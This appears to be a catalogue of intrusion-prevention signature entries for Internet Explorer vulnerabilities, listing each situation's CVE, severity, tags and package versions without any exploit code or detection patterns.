Vulnerability: MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3143
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3145

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-07, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-531-5211
Vulnerability: MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3145
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3146

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-07, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-531-5211
Vulnerability: MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3146
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3147

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-07, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-531-5211
Vulnerability: MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3147
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3148

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-07, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-531-5211
Vulnerability: MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3148
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-0988

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2018-04, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Memory-Corruption-CVE-2018-0988
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8267

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2018-06, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Internet-Explorer-Memory-Corruption-CVE-2018-8267
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8447

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-09, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Memory-Corruption-CVE-2018-8447
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8456

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-09, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8456
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8461

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-09, CVE2018, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Memory-Corruption-CVE-2018-8461
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2015-0099

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, MS2015-03, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Vulnerability: Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2015-0099
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0063

About this situation: An attempt exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-02, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0063
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0113

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-03, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-741-5211
Vulnerability: Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0113
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0164

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-04, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-755-5211
Vulnerability: Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0164
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0200

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-06, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0200
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3240

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-07, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3240
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3241

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-07, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3241
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3242

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-07, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3242
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3259

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-07, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3259
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8460

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-10, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1108-5242
Vulnerability: Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8460
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8491

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-10, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1108-5242
Vulnerability: Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8491
Description:
Back to top

File-Text_Internet-Explorer-MSHTML-CSS-Buffer-Overflow

About this situation: Malicious CSS file detected, possible system compromise
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Internet Explorer 6.0, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Internet-Explorer-MSHTML-CSS-Buffer-Overflow
Description:
Back to top

File-Text_Internet-Explorer-MSHTML.DLL-Parsing-DoS

About this situation: An attempt to exploit an Internet Explorer MSHTML.DLL Parsing DoS vulnerability.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer, Any Operating System not specific, Internet Explorer not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-671-5211
Last changed: sgpkg-ips-671-5211
Vulnerability: Internet-Explorer-MSHTML.DLL-Parsing-DoS
Description:
Back to top

File-Text_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability

About this situation: Detects HTML pages trying to use CLSIDs of msoe.dll, chtskdic.dll and imskdic.dll, possible exploit
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2007-05, CVE2006, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability
Internet-Explorer-Chtskdic.dll-Com-Object-Instantiation-Memory-Corruption
Description:
Back to top

File-Text_Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-02, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP_Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption
Description:
Back to top

File-Text_Internet-Explorer-Multiple-Com-Objects-System-Compromise

About this situation: CLSID of an illegal COM object detected
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2005-08, CVE2005, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Internet-Explorer-Multiple-Com-Objects-System-Compromise
Description:
Back to top

File-Text_Internet-Explorer-Nested-Object-Tag-Memory-Corruption

About this situation: Detects HTML pages with multiple nested OBJECT tags, possible Internet Explorer exploit
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2006-06, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-991-5242
Vulnerability: HTTP-Internet-Explorer-Nested-Object-Tag-Memory-Corruption
Description:
Back to top

File-Text_Internet-Explorer-NMSA-ASFSourceMediaDescription-CVE-2006-3897

About this situation: An attempt exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-721-5211
Description:
Back to top

File-Text_Internet-Explorer-Object-Tag-Popup

About this situation: Attempt to bypass object type checks via popup in Internet Explorer was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 4.0, Internet Explorer 5.5, MS2003, CVE2003, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-Object-Tag-Popup
Description:
Back to top

File-Text_Internet-Explorer-Object-Type-Open-Window

About this situation: Attempt to bypass object type checks via open window in Internet Explorer was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 4.0, Internet Explorer 5.5, MS2003, CVE2003, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-Object-Tag-Popup
Description:
Back to top

File-Text_Internet-Explorer-Object.Microsoft.DXTFilter.Enabled-DoS

About this situation: An attempt exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-721-5211
Description:
Back to top

File-Text_Internet-Explorer-OutlookExpress.AddressBook-DoS

About this situation: An attempt to exploit an Internet Explorer OutlookExpress.AddressBook DoS vulnerability.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2005, Windows not specific, Internet Explorer not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-671-5211
Last changed: sgpkg-ips-671-5211
Vulnerability: Internet-Explorer-OutlookExpress.AddressBook-DoS
Description:
Back to top

File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2017-07, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1661-5242
Vulnerability: Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594
Description:
Back to top

File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8618

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, MS2017-07, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8618
Description:
Back to top

File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8653

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-12, CVE2018, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1623-5242
Vulnerability: Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8653
Description:
Back to top

File-Text_Internet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2020-17053

About this situation: An attempt to exploit a vulnerability in Internet Explorer Scripting Engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2020-11, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1295-5242
Vulnerability: Internet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2020-17053
Description:
Back to top

File-Text_Internet-Explorer-Scroll-Event-Remote-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-10, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-417-4219
Vulnerability: Internet-Explorer-Scroll-Event-Remote-Code-Execution
Description:
Back to top

File-Text_Internet-Explorer-Security-Zone-Bypass-Url-Spoofing

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-434-4219
Vulnerability: Internet-Explorer-Security-Zone-Bypass-Url-Spoofing
Description:
Back to top

File-Text_Internet-Explorer-Sysmon-ActiveX-Denial-Of-Service

About this situation: An attempt exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-590-5211
Description:
Back to top

File-Text_Internet-Explorer-toStaticHTML-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-10, CVE2011, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1734-5242
Vulnerability: Internet-Explorer-toStaticHTML-Cross-Site-Scripting
Description:
Back to top

File-Text_Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-08, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557
Description:
Back to top

File-Text_Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-08, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559
Description:
Back to top

File-Text_Internet-Explorer-Uninitialized-Parameter-DoS

About this situation: An attempt to exploit an Internet Explorer Uninitialized Parameter DoS vulnerability.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer, Any Operating System not specific, Internet Explorer not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: Internet-Explorer-Uninitialized-Parameter-DoS
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2012-4787

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2012-12, CVE2012, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-497-5211
Last changed: sgpkg-ips-497-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2012-4787
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2012-4792

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-01, CVE2012, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-500-5211
Last changed: sgpkg-ips-505-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2012-4792
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0025-And-CVE-2013-1288

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-02, MS2013-03, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-509-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2013-0025
Internet-Explorer-Use-After-Free-CVE-2013-1288
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0026

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-02, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-509-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2013-0026
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0029

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-02, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-511-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2013-0029
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0087

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-03, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-515-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2013-0087
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0088

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-03, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-515-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2013-0088
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0090

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-03, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-515-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2013-0090
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0091

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-03, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-515-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2013-0091
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0092

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-03, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-515-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2013-0092
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0093

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-03, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-515-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2013-0093
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0094

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-03, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-515-5211
Vulnerability: Internet-Explorer-Use-After-Free-CVE-2013-0094
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-2551

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-05, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-525-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-2551
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3110

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-526-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3110
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3111

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-526-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3111
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3112

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-526-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3112
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3112-2

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-547-5211
Last changed: sgpkg-ips-547-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3112
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3116

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-526-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3116
Description:
Back to top

